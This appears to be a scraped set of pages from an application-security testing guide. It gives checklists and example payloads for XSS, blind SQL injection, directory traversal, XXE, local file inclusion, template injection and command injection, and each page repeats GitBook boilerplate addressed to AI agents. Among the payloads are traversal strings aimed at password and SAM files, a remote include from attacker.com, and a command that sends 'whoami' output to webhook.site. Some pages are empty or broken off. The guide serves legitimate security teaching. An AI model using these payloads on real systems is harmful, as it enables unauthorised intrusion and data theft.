GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology.md). # XSS Methodology 1. \*\*Discovery and Mapping:\*\* \* \[ \] Enumerate all endpoints, parameters, and user inputs. \* \[ \] Identify entry points such as query parameters, request bodies, and HTTP headers. 2. \*\*Generate Test Inputs:\*\* \* \[ \] Use a unique value for each entry point. \* \[ \] Inject these values to observe if and how they're reflected or stored. 3. \*\*Submit and Observe:\*\* \* \[ \] Submit the test inputs to all identified entry points. \* \[ \] Monitor both the immediate and subsequent HTTP responses for reflection or persistence of the input data. 4. \*\*Context Analysis:\*\* \* \[ \] Analyse where and how the input is reflected or stored in the application. \* \[ \] Pay attention to the surrounding HTML, JavaScript, or attribute context to craft effective payloads. 5. \*\*Crafting XSS Payloads:\*\* \* \[ \] Create payloads suitable for the identified contexts. \* \[ \] Alternatively use a pre-made list. 6. \*\*Payload Testing:\*\* \* \[ \] Fuzz with the crafted payloads. \* \[ \] For reflected XSS, test if the payload is reflected in the immediate response. \* \[ \] For stored XSS, check if the payload persists in storage and is executed in subsequent responses. \* \[ \] For DOM-based XSS, examine the source and trace the flow to any sinks in the DOM, then test payloads that interact with these sinks. 7. \*\*Browser Execution:\*\* \* \[ \] Execute the payloads in a browser to verify script execution. \* \[ \] Use simple JavaScript like \`prompt(document.domain)\` to test for execution. 8. \*\*Document Reflections and Payload Execution:\*\* \* \[ \] Document the precise location and context of each reflected, stored, or DOM-based input. \* \[ \] Take note of successful payloads and their outcomes. 9. \*\*Exploit Refinement:\*\* \* \[ \] If the initial payloads are blocked or sanitized, refine them by using different encodings or obfuscation techniques. \* \[ \] Consider all possible filter bypass techniques based on the application's behavior. 10. \*\*Automated Scanning:\*\* \* \[ \] Use automated scanning tools to identify potential XSS vulnerabilities. However, manual confirmation is necessary, as automated tools can generate false positives and negatives. 11. \*\*Test for Browser Quirks:\*\* \* \[ \] Test how different browsers interpret the payloads. Some browsers may encode or decode inputs differently, affecting payload delivery. 12. \*\*Confirm Persistent Storage (Stored XSS):\*\* \* \[ \] Verify that the payload is stored and executed across sessions or different user accounts, confirming a stored XSS vulnerability. 13. \*\*Check for Execution Context (DOM-based XSS):\*\* \* \[ \] For DOM-based XSS, use browser developer tools to check how the payload is handled by the browser's JavaScript engine. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli.md). # Blind SQLi ### Blind SQL Injection Blind SQL injection (Blind SQLi) is a type of SQL injection attack where the attacker can exploit the database, but the application does not display the output. Instead, the attacker must "infer" data by sending payloads and observing the application's behavior or responses. \*\*A simple example:\*\* \* A vulnearble webapp uses an API for its search to return the number of results found. \* A user searches for a product, and the application returns with "X products found" without displaying product details. \* The application uses the SQL query \`SELECT COUNT(\*) FROM products WHERE product\_name LIKE '%{searchTerm}%'\`. \* An attacker could exploit this by injecting SQL conditions into the \`{searchTerm}\`. \* For exmaple, searching for \`laptop' AND 1=1-- -\` returns "1 product found" and searching for \`laptop' AND 1=2-- -\` returns "0 products found", this behavior can be an indicator of a potential Blind SQLi vulnerability. Blind SQLi is more time-consuming than regular SQLi but is just as dangerous. It can lead to: \* Sensitive data exposure \* Data manipulation \* Authentication bypass \* Potential discovery of hidden data ### Other learning resources: \* OWASP: \* SQLmap's guide on Blind SQLi: \* PenTestMonkey's Cheat Sheet: \### Writeups: ### Checklist: \* \[ \] Identify potential vulnerable points: \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g. cookies, user-agent) \* \[ \] Hidden fields \* \[ \] Test for true/false conditions: \* \[ \] Can you get a "true" condition? E.g., \`' AND 1=1-- -\` \* \[ \] Can you get a "false" condition? E.g., \`' AND 1=2-- -\` \* \[ \] Time-based Blind SQLi: \* \[ \] Introduce artificial delays using functions like \`SLEEP()\` or \`BENCHMARK()\` \* \[ \] Measure response times \* \[ \] Error-based Blind SQLi: \* \[ \] Test a divide by zero payload \* \[ \] Can we trigger an error message? \* \[ \] Can we use \`CAST()\` to trigger an error and view the data? \* \[ \] Content-based Blind SQLi: \* \[ \] Check for changes in page content based on payloads \* \[ \] Out-of-band (OAST): \* \[ \] Can we trigger a DNS query? \* \[ \] Can we append some data to the subdomain of the URL to exfiltrate information? \* \[ \] Binary search based extraction: \* \[ \] Exploit faster by dividing data and querying \* \[ \] Backend specifics: \* \[ \] Are you dealing with MySQL, MSSQL, Oracle, PostgreSQL, SQLite? \* \[ \] Adjust your payloads accordingly \* \[ \] Test with automated tools: \* \[ \] SQLmap with \`--technique=B\` flag \* \[ \] Encoding and obfuscation: \* \[ \] Test with URL encoding, hex encoding, or other methods to bypass filters \* \[ \] Bypassing filters: \* \[ \] Use comments, spaces, or alternative syntax \* \[ \] Exploitation: \* \[ \] Extract database version, e.g., \`AND (SELECT SUBSTRING(version(),1,1))='5'\` \* \[ \] Fetch data character by character \* \[ \] Extract data from information\\\_schema --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering.md). # Spidering --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection.md). # Server-side template injection --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal.md). # Directory traversal ## What is it? Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to read files on the victim’s system by manipulating file paths used in the application. \*\*A simple example:\*\* A vulnerable web application may have the endpoint /get\\\_file?path={filepath} When a request is made, the application returns the content of the specified file. If an attacker inserts a path into {filepath} such as ../../../etc/passwd, they might get access to the system files. The application then fetches this file, and if the file contents are sent in the response, the attacker can view sensitive system information. Remember that a payload or attack may change depending on the application and the server's file system. Directory Traversal can often lead to: \* Sensitive data exposure \* System information disclosure \*\*Other learning resources:\*\* PortSwigger: \## Checklist \* \[ \] What is the technology stack you're attacking? \* \[ \] What application/framework is being used? \* \[ \] Is it PHP, Java, Python, .NET, etc? \* \[ \] Verify injection points \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g. cookies, etc) \* \[ \] Check if you can traverse to directories outside of the webroot: \* \[ \] ../../../../etc/passwd \* \[ \] ../../../../Windows/System32/config/SAM (Windows) \* \[ \] Is there a blocklist? \* \[ \] Is there a filter? \* \[ \] Is the filter recursive? \* \[ \] Is the filter on single characters or sets? (e.g. / vs ../) \* \[ \] Can you bypass the blocklist? \* \[ \] Is a specific extension required? \* \[ \] Can you read a sensitive file with allowed extensions? \* \[ \] Can you bypass with: \* \[ \] Null byte? %00 \* \[ \] Encoding \* \[ \] Double encoding \* \[ \] URL encoding \* \[ \] Unicode encoding \* \[ \] Test for log exposure \* \[ \] Can you read log files? \* \[ \] Other unexpected bypasses ../../ in the middle of the path ## Exploitation Basic directory traversal \`\`\` ../../../../etc/passwd \`\`\` Reading application's own configuration files \`\`\` ../../webapp/config/database.ini \`\`\` Log exposure \`\`\` ../../../../var/log/apache2/access.log \`\`\` Non-recursive filter bypass \`\`\` ..././..././..././..././..././..././etc/passwd \`\`\` ## Tools {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe.md). # Blind XXE ## What is it? Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application. ## Exploitation Blind XXE using OOB \`\`\`xml \]> &xxe; \`\`\` Blind XXE using OOB with XML parameter entities \`\`\`xml %xxe; \]> \`\`\` Solution \`\`\` 1. Check the stock of an item and send the POST request with XML to repeater 2. \`\`\` \--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection.md). # Client-side template injection --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion.md). # Local file inclusion ## What is it? Local File Inclusion (LFI) is a vulnerability that allows an attacker to read and sometimes execute files on the victim’s system. This could lead to revealing sensitive information or even remote code execution if handled poorly by the application. \*\*A simple example:\*\* \* A vulnerable web application may have the endpoint /page?file={filename} \* When a request is made, the application includes the specified file into the current script. \* If an attacker inserts a path into {filename} such as ../../../etc/passwd, they might get access to the system files. \* The application then includes this file, and if the file contents are outputted to the response, the attacker can view sensitive system information. It's important to note that a payload or attack may change depending on the application and the server's file system. LFI can often lead to: \* Sensitive data exposure \* Remote code execution \* Server information disclosure \*\*Other learning resources:\*\* \* PortSwigger: ; \* PayloadsAllTheThings: \## \*\*Checklist\*\* \* \[ \] What is the technology stack you're attacking? \* \[ \] What application/framework is being used? Is it PHP, Java, Python, .NET, etc? \* \[ \] Verify injection points \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers (e.g. cookies, etc) \* \[ \] Try to include local files /etc/passwd /boot.ini (Windows) \* \[ \] Check for file protocol handlers file:// php\\://filter php\\://input data:// \* \[ \] Test for log poisoning \* \[ \] Can you inject input into log files? \* \[ \] Can you then include those log files? \* \[ \] Is there a blocklist? \* \[ \] Is there a filter? \* \[ \] Is the filter recursive? \* \[ \] Is the filter on single characters or sets? (e.g. \`/\` vs \`../\`) \* \[ \] Can you bypass the blocklist? \* \[ \] Is a specific extension required? \* \[ \] Can we include a sensitive file with allowed extensions \* \[ \] Can we bypass with null byte? %00 \* \[ \] Encoding \* \[ \] Double encoding \* \[ \] URL encoding \* \[ \] Unicode encoding \* \[ \] Test for remote file inclusion (RFI) Can you host a file remotely and include it? \* \[ \] Other weird bypasses \* \[ \] ../../ in the middle of the path ## Exploitation Basic file inclusion \`\`\` ../../../etc/passwd \`\`\` Using PHP filter for base64 encoding of the file \`\`\` php://filter/read=convert.base64-encode/resource=index.php \`\`\` Log poisoning \`\`\` ../../../var/log/apache2/access.log \`\`\` RFI (if allow\\\_url\\\_include is on) \`\`\` http://attacker.com/malicious.txt \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection.md). # Template injection ## What is it? Template Injection attacks occur when an attacker can inject malicious input into template expressions, causing the application to execute unintended instructions. These attacks exploit weaknesses in the way applications interpret template expressions, often leading to remote code execution or data exposure. Template engines are used in various programming languages and frameworks to dynamically generate HTML, XML, or other output formats. While they often have sandboxing features to limit the effects of template injection, these can sometimes be bypassed. There are many types of Template Injection, which can occur in different template engines, including: \* Server-side Template Injection (SSTI) \* AngularJS Template Injection \* Jinja2 Template Injection \* Twig Template Injection \* Freemarker Template Injection \* Django Template Injection ## Detection \`\`\` ${3\*3} ${3\*'3'} ${{3\*3}} #{3\*3} \*{3\*3} {{3\*3}} <%= 3\*3 %> \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection.md). # Detection Mostly SQL injection vulnerabilities can be found using modern scanners. However, for more complex scenarios such as second-order SQLi, manual testing can also be used. The goal with many of these tests is to invoke some behaviour change in the application. Be sure to closely monitor for: \* \[ \] Content-Length header changes \* \[ \] Error messages \* \[ \] Changes in the data returned \* \[ \] Delays \* \[ \] Second-order (i.e. you inject somewhere, but another interaction is required to trigger the payload) ### Test cases: \* \[ \] Test with single and double quotes \* \[ \] Test with comments or terminators to mask the rest of the query \* \[ \] Test with other special characters that can manipulate SQL statements \* \[ \] Test with boolean conditions \`and 1=1\` and \`and 1=2\` (closely monitor the application response, in particular the Content-Length header) \* \[ \] Test with functions that cause time delays \* \[ \] MySQL \`sleep(5)\` \* \[ \] PostgreSQL \`pg\_sleep(5)\` \* \[ \] MS SQL Server \`WAITFOR DELAY '0:0:05'\` \* \[ \] Oracle \`dbms\_pipe.receive\_message(('x'),5)\` \* \[ \] Test with out-of-band (OOB) or out-of-band application security testing (OAST) techniques \* \[ \] Test for stacked queries \* \[ \] Test for \`UNION\` keyword \* \[ \] \`SELECT username,password FROM users UNION SELECT null,null\` \* \[ \] Test for the number of columns using \`null,null\` or \`ORDER BY 1\` , \`ORDER BY 2\` \* \[ \] Test the data types with \`'a',1\` etc \* \[ \] Test with different encoding techniques \* \[ \] Test evasion techniques \* \[ \] Test with encoded payloads \* \[ \] Test with builting functions \* \[ \] E.g. \`CHAR()\` \* \[ \] Test ways to bypass commonly filtered characters \* \[ \] E.g. replacing space with \`/\*\*/\` ### Detection syntax #### General \`\`\` {payload}-- {payload};-- {payload}# '||{payload}-- '||{payload}# "{payload}-- "{payload}# ' AND {payload}-- ' OR {payload}-- ' AND EXISTS({payload})-- ' OR EXISTS({payload})-- \`\`\` #### MySQL \`\`\` ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- '||{payload}-- "||{payload}-- '||(SELECT {payload})-- "||(SELECT {payload})-- \`\`\` #### PostgeSQL \`\`\` ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- \`\`\` #### Oracle \`\`\` ' UNION ALL SELECT {payload} FROM dual-- ' UNION SELECT {payload} FROM dual-- ' OR (SELECT {payload} FROM dual) IS NOT NULL-- ' OR (SELECT {payload} FROM dual) IS NULL-- '||({payload})-- '||{payload}||'-- "||{payload}||"-- '||(SELECT {payload} FROM dual)-- \`\`\` ### MSSQL \`\`\` ' UNION ALL SELECT {payload}-- ' UNION SELECT {payload}-- ' OR (SELECT {payload}) IS NOT NULL-- ' OR (SELECT {payload}) IS NULL-- '+{payload}+ "+{payload}+ '+'+(SELECT {payload})+ "+"+(SELECT {payload})+ \`\`\` ### Other Payloads \`\`\` OR {payload}=1 AND {payload}=1 AND IF({payload}, SLEEP(5), 1) AND CASE WHEN {payload} THEN sleep(5) ELSE NULL END AND {payload} AND NOT {payload} AND (SELECT 1 FROM(SELECT COUNT(\*),CONCAT('Error:',{payload},0x3a,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) \`\`\` ### Tools: #### SQLmap The easiest way to get started with SQLmap is to either save a request to a file or copy a request as curl and change the curl command to sqlmap. ![](https://appsecexplained.gitbook.io/files/a0lJMZt0lsx1eP6ZIrCj) Copying a request as cURL \`\`\` # Original curl request curl 'http://localhost/labs/i0x01.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8' -H 'Accept-Language: en-GB,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/labs/i0x01.php' -H 'Cookie: csrf0x02=jeremy' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' --data-raw 'username=jeremy' # Update 'curl' to 'sqlmap' and optionally add sqlmap flags sqlmap 'http://localhost/labs/i0x01.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8' -H 'Accept-Language: en-GB,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/labs/i0x01.php' -H 'Cookie: csrf0x02=jeremy' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' --data-raw 'username=jeremy' \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection.md). # Command injection ## What is it? Command injection is a vulnerability that allows an attacker to manipulate an application to execute arbitrary system commands on the server. This occurs when an application passes unsafe data, often user input, to a system shell. \*\*A simple example\*\* A vulnerable web application might take a path from a query parameter and use it to read a file, like so: \`\`\` $file = $\_GET\['file'\]; system("cat /var/www/html/$file"); \`\`\` If an attacker uses a payload such as \`; ls -la\` in the \`file\` parameter, they can make the application execute an additional command that lists all files in the current directory. The server then executes the \`cat\` command and the \`ls\` command and the attacker receives a list of all files in the current directory. Command injection can often lead to: \* Remote code execution \* Denial of Service \* Data breach \* Privilege escalation \*\*Other learning resources:\*\* \* PortSwigger: \* OWASP: \*\*Writeups:\*\* \* Bullets ## Checklist \* \[ \] Determine the technology stack: Which operating system and server software are in use? \* \[ \] Identify potential injection points: URL parameters, form fields, HTTP headers, etc. \* \[ \] Test for simple injections with special characters like ;, &&, ||, and |. Test for injection within command arguments. \* \[ \] Test for blind command injection, where output is not returned in the response. If output isn't directly visible, try creating outbound requests (e.g. using ping or curl). \* \[ \] Try to escape from any restriction mechanisms, like quotes or double quotes. \* \[ \] Test with a list of potentially dangerous functions/methods (like exec(), system(), passthru() in PHP, or exec, eval in Node.js). \* \[ \] Test for command injection using time delays (ping -c localhost). \* \[ \] Test for command injection using &&, ||, and ;. \* \[ \] Test with common command injection payloads, such as those from PayloadsAllTheThings. \* \[ \] If there's a filter in place, try to bypass it using various techniques like encoding, command splitting, etc. ## Exploitation Basic command chaining \`\`\` ; ls -la \`\`\` Using logic operators \`\`\` && ls -la \`\`\` Commenting out the rest of a command \`\`\` ; ls -la # \`\`\` Using a pipe for command chaining \`\`\` | ls -la \`\`\` Testing for blind injection \`\`\` ; sleep 10 ; ping -c 10 127.0.0.1 & whoami > /var/www/html/whoami.txt & \`\`\` Out-of-band testing \`\`\` & nslookup webhook.site/?\`whoami\` & \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication.md). # Authentication ## What is it? Authentication is the process by which a system confirms the identity of a user or application. It's essentially all about \*\*who you are\*\*. Targeting authentication mechanisms allow us to to impersonate users, admins, or systems and gain unauthorized access. Often, we look to attack logic issues and lack of brute-force protection. Common targets in 